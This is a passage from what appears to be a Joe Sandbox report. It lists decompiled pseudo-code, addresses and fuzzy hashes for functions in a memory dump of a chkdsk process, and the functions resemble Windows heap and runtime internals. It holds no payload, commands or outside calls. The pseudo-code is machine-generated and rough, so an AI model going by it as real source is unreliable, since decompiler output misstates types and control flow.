							_t21 = E04DBF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04E07016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04DA2400( &_v52);
								}
								_t21 = L04DA2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                      0x04e06cfb
                                                      0x04e06d00
                                                      0x04e06d02
                                                      0x04e06d06
                                                      0x04e06d0a
                                                      0x04e06d0e
                                                      0x04e06d19
                                                      0x04e06d2b
                                                      0x04e06d1b
                                                      0x04e06d24
                                                      0x04e06d24
                                                      0x04e06d33
                                                      0x04e06d39
                                                      0x04e06d46
                                                      0x04e06d4f
                                                      0x04e06d61
                                                      0x04e06d51
                                                      0x04e06d5a
                                                      0x04e06d5a
                                                      0x04e06d69
                                                      0x04e06d6b
                                                      0x04e06d6d
                                                      0x04e06d6f
                                                      0x04e06d6f
                                                      0x04e06d74
                                                      0x04e06d79
                                                      0x04e06d7a
                                                      0x04e06d7f
                                                      0x04e06d82
                                                      0x04e06d88
                                                      0x04e06d89
                                                      0x04e06d90
                                                      0x04e06d94
                                                      0x04e06da7
                                                      0x04e06db1
                                                      0x04e06db1
                                                      0x04e06dbb
                                                      0x04e06dbb
                                                      0x04e06d90
                                                      0x04e06d69
                                                      0x04e06d46
                                                      0x04e06dc6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7db944d9be854c4ce369af1eb136e5fc3d8c512de0bbeb016a014cbb95c7d35a
                                                      • Instruction ID: b83234da4f532fff035f76e154bbb8b20de1cad49ffcff2c8c0154d4b84266e8
                                                      • Opcode Fuzzy Hash: 7db944d9be854c4ce369af1eb136e5fc3d8c512de0bbeb016a014cbb95c7d35a
                                                      • Instruction Fuzzy Hash: 882122326042459BD711EF39C944BABBBECEF81358F044456F850C72A0E734E998C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E5070D Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E04E5070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04E507DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04E4AFDE( &_v8,  &_v12);
					E04E51293(_t38, _v28, _t60);
					if(E04DA7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04E414FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                      0x04e5071b
                                                      0x04e50724
                                                      0x04e50734
                                                      0x04e50738
                                                      0x04e5074b
                                                      0x04e5074b
                                                      0x04e50753
                                                      0x04e50753
                                                      0x04e50759
                                                      0x04e5075d
                                                      0x04e50774
                                                      0x04e50779
                                                      0x04e5077d
                                                      0x04e50789
                                                      0x04e50795
                                                      0x04e507a7
                                                      0x04e50797
                                                      0x04e507a0
                                                      0x04e507a0
                                                      0x04e507af
                                                      0x04e507c4
                                                      0x04e507cd
                                                      0x04e507cd
                                                      0x04e507af
                                                      0x04e507dc

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: 55c23a359661fa4adf56228340b0549de734f2490e46200d94e14e39230704c5
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: A92126363042009FD705EF18D884BAABBA5EFC4754F048569FD958B391D730E909CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DAAE73 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E04DAAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04DA7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04DA7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04DA7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04DA7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04E07794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                      0x04daae78
                                                      0x04daae7c
                                                      0x04daae7e
                                                      0x04daae81
                                                      0x04daae86
                                                      0x04daae8d
                                                      0x04df2691
                                                      0x04daae93
                                                      0x04daae93
                                                      0x04daae93
                                                      0x04daae98
                                                      0x04daae9d
                                                      0x04df26a2
                                                      0x04df26b4
                                                      0x04df26a4
                                                      0x04df26ad
                                                      0x04df26ad
                                                      0x04df26b9
                                                      0x00000000
                                                      0x04df26bb
                                                      0x00000000
                                                      0x04df26bb
                                                      0x04daaea3
                                                      0x04daaea3
                                                      0x04daaea3
                                                      0x04daaeaa
                                                      0x04df26c0
                                                      0x04df26c9
                                                      0x04df26c9
                                                      0x04daaeb3
                                                      0x04df26d4
                                                      0x04df26e1
                                                      0x00000000
                                                      0x00000000
                                                      0x04df26e7
                                                      0x04df26ee
                                                      0x04df26f0
                                                      0x04df26f9
                                                      0x04df26f9
                                                      0x04df2702
                                                      0x04df2708
                                                      0x04df2708
                                                      0x04df270b
                                                      0x04df270f
                                                      0x04df2711
                                                      0x04df2711
                                                      0x04df2725
                                                      0x04df2725
                                                      0x00000000
                                                      0x04daaeb9
                                                      0x04daaeb9
                                                      0x04daaebf
                                                      0x04daaebf
                                                      0x04daaeb3

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 345f30b95f6d5a29c15b89413a1f869e1d322f145dedf69f36bee895081766b3
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: E521BB71701680DBEB269B29C944B2577E8FF44344F0A00E1EE048B7A2E77AFD50C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E07794 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E04E07794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4e77b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04DCF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04DA7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04DC9AE0();
					_t24 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                      0x04e07799
                                                      0x04e0779a
                                                      0x04e0779b
                                                      0x04e077a3
                                                      0x04e077ab
                                                      0x04e077ae
                                                      0x04e077b1
                                                      0x04e077b1
                                                      0x04e077bf
                                                      0x04e077c4
                                                      0x04e077c8
                                                      0x04e077ce
                                                      0x04e077d4
                                                      0x04e077e0
                                                      0x04e077e0
                                                      0x04e077d6
                                                      0x04e077d6
                                                      0x04e077de
                                                      0x00000000
                                                      0x00000000
                                                      0x04e077de
                                                      0x04e077e5
                                                      0x04e077f0
                                                      0x04e077f3
                                                      0x04e077f6
                                                      0x04e077fd
                                                      0x04e07800
                                                      0x04e0780c
                                                      0x04e07818
                                                      0x04e0782b
                                                      0x04e0781a
                                                      0x04e07823
                                                      0x04e07823
                                                      0x04e07830
                                                      0x04e07831
                                                      0x04e07838
                                                      0x04e0783d
                                                      0x04e0783e
                                                      0x04e0784f
                                                      0x04e0784f
                                                      0x04e0785a

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04810072137b8e72fa9ddca6ed6220d9f405e63651a6d57757d6921e6a88ae31
                                                      • Instruction ID: 732e6bcbea36a44b536edd319ddf4b35d02aec7d7013ed9999850f4030024161
                                                      • Opcode Fuzzy Hash: 04810072137b8e72fa9ddca6ed6220d9f405e63651a6d57757d6921e6a88ae31
                                                      • Instruction Fuzzy Hash: C421DE72A00604EBC725DF69D880EABB7A9EF48384F14416DF90AC7790E634F900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBFD9B Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E04DBFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04D976E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                      0x04dbfd9b
                                                      0x04dbfda0
                                                      0x04dbfda1
                                                      0x04dbfdab
                                                      0x04dbfdad
                                                      0x04dbfdb0
                                                      0x04dbfdb8
                                                      0x04dbfe0f
                                                      0x04dbfde6
                                                      0x04dbfde9
                                                      0x04dbfdec
                                                      0x04dfc0c0
                                                      0x04dbfdfe
                                                      0x04dbfe06
                                                      0x04dbfe06
                                                      0x04dfc0c8
                                                      0x04dbfe2d
                                                      0x04dbfe2d
                                                      0x00000000
                                                      0x04dbfe2d
                                                      0x04dfc0d1
                                                      0x04dfc0e0
                                                      0x04dfc0e5
                                                      0x04dfc0e5
                                                      0x04dfc0e8
                                                      0x00000000
                                                      0x04dfc0e8
                                                      0x04dbfdf4
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbfdf6
                                                      0x04dbfdfa
                                                      0x04dbfe1a
                                                      0x04dbfe1f
                                                      0x04dbfe1f
                                                      0x04dbfdfc
                                                      0x00000000
                                                      0x04dbfdfc
                                                      0x04dbfdcc
                                                      0x04dbfdd0
                                                      0x04dbfe26
                                                      0x00000000
                                                      0x04dbfe26
                                                      0x04dbfdd8
                                                      0x04dbfddb
                                                      0x04dbfddd
                                                      0x04dbfde0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: 4bd66e8bb92a255f2cf16334048bdde0d9d23796a00a69ee35695d4ec5bb06f4
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: D0217972A00A44DBD735CF09C940EA6B7E5FB94B10F25816EE98AC7610E730FC00DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D89240 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E04D89240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4e5f708);
				E04DDD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04DC95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04DC95D0();
				_t33 =  *0x4e784c4; // 0x0
				L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4e784c4; // 0x0
				L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4e784c4; // 0x0
				E04DA2280(L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4e786b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04DC95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04DC95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04D89325();
					_t50 =  *0x4e784c4; // 0x0
					return E04DDD0D1(L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                      0x04d89240
                                                      0x04d89242
                                                      0x04d89247
                                                      0x04d8924c
                                                      0x04d8924e
                                                      0x04d89255
                                                      0x04d89257
                                                      0x04d8925a
                                                      0x04d8925f
                                                      0x04d8925f
                                                      0x04d89266
                                                      0x04d89271
                                                      0x04d89276
                                                      0x04d89279
                                                      0x04d8927e
                                                      0x04d89295
                                                      0x04d8929a
                                                      0x04d892b1
                                                      0x04d892b6
                                                      0x04d892d7
                                                      0x04d892dc
                                                      0x04d892e0
                                                      0x04d892e6
                                                      0x04d892e8
                                                      0x04d892ee
                                                      0x04d89332
                                                      0x04d89333
                                                      0x04d89337
                                                      0x04d89338
                                                      0x04d8933a
                                                      0x04d8933a
                                                      0x04d8933d
                                                      0x04d89342
                                                      0x04d89342
                                                      0x04d89345
                                                      0x04d89349
                                                      0x04d8934e
                                                      0x04d89352
                                                      0x04d89357
                                                      0x04d892f4
                                                      0x04d892f4
                                                      0x04d892f6
                                                      0x04d892f9
                                                      0x04d89300
                                                      0x04d89306
                                                      0x04d89324
                                                      0x04d89324

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 285170e1e147327fc822676c9b741aa4c455696c5a4bb3707aba5610f968e4f4
                                                      • Instruction ID: 896aaf08fa3b4226d4efe6ec846433caf5292790836020fd6c46a3684db8c4f8
                                                      • Opcode Fuzzy Hash: 285170e1e147327fc822676c9b741aa4c455696c5a4bb3707aba5610f968e4f4
                                                      • Instruction Fuzzy Hash: C0216672241600DFD721FF68CA10B2AB7B9FF08718F1045ACA04A866B1DA34F951DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBB390 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E04DBB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04DA2280(_t12, 0x4e78608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04DC00C2(0x4e78608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                      0x04dbb395
                                                      0x04dbb3a2
                                                      0x04dbb3a5
                                                      0x04dbb3aa
                                                      0x04dbb3b2
                                                      0x04dbb3ba
                                                      0x04dbb3bd
                                                      0x04dbb3c0
                                                      0x04dbb3c4
                                                      0x04dbb3c9
                                                      0x04dfa3e9
                                                      0x04dfa3ed
                                                      0x04dfa3f0
                                                      0x04dfa3ff
                                                      0x04dfa403
                                                      0x04dfa409
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfa40b
                                                      0x04dfa40b
                                                      0x04dfa40f
                                                      0x04dfa415
                                                      0x04dfa423
                                                      0x04dfa423
                                                      0x04dfa415
                                                      0x04dbb3d1
                                                      0x04dbb3e8
                                                      0x04dbb3e8
                                                      0x04dbb3d9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00f984276fea9390f96dfe811af73b5d083a98302775b651248f63cb12ee1a79
                                                      • Instruction ID: c7a37c402fb174616b648b70b6d9617f17cb641a63ebe869e9dd042530af32e9
                                                      • Opcode Fuzzy Hash: 00f984276fea9390f96dfe811af73b5d083a98302775b651248f63cb12ee1a79
                                                      • Instruction Fuzzy Hash: 22118833301210DBDF289A559D81A6B7296FBC5730B29052ADA5A87780D932FC02C2D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E14257 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E04E14257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4e608d0);
				E04DDD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04E141E8(__ebx, __edi, __ecx, _t39);
				E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4e787e4;
					_t18 =  *0x4e787e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4e75cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4e787e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4e787e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04D87055(_t31 + 0xfffffff8);
								_t24 =  *0x4e787e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4e787e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4e75cd0;
				if( *0x4e75cd0 <= 0) {
					L04D87055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4e787e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4e787e8 = _t30;
						 *0x4e787e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04DDD0D1(L04E14320());
			}















                                                      0x04e14257
                                                      0x04e14257
                                                      0x04e14257
                                                      0x04e14259
                                                      0x04e1425e
                                                      0x04e14263
                                                      0x04e14265
                                                      0x04e14273
                                                      0x04e14278
                                                      0x04e1427c
                                                      0x04e1427f
                                                      0x04e14281
                                                      0x04e14287
                                                      0x04e142d7
                                                      0x04e142d7
                                                      0x04e142da
                                                      0x04e1428d
                                                      0x04e1428d
                                                      0x04e1428f
                                                      0x04e14292
                                                      0x04e14297
                                                      0x04e1429c
                                                      0x04e142a0
                                                      0x04e142a6
                                                      0x04e142a8
                                                      0x04e142ae
                                                      0x04e142b3
                                                      0x00000000
                                                      0x04e142ba
                                                      0x04e142ba
                                                      0x04e142bf
                                                      0x04e142c5
                                                      0x04e142ca
                                                      0x04e142cf
                                                      0x04e142d0
                                                      0x00000000
                                                      0x04e142d0
                                                      0x04e142b3
                                                      0x00000000
                                                      0x04e142a6
                                                      0x04e1429c
                                                      0x04e142dc
                                                      0x04e142dc
                                                      0x04e142e3
                                                      0x04e14309
                                                      0x04e142e5
                                                      0x04e142e5
                                                      0x04e142e8
                                                      0x04e142ee
                                                      0x04e142f0
                                                      0x00000000
                                                      0x04e142f2
                                                      0x04e142f2
                                                      0x04e142f4
                                                      0x04e142f7
                                                      0x04e142f9
                                                      0x04e14300
                                                      0x04e14300
                                                      0x04e142f0
                                                      0x04e1430e
                                                      0x04e1431f

                                                      Memory Dump Source
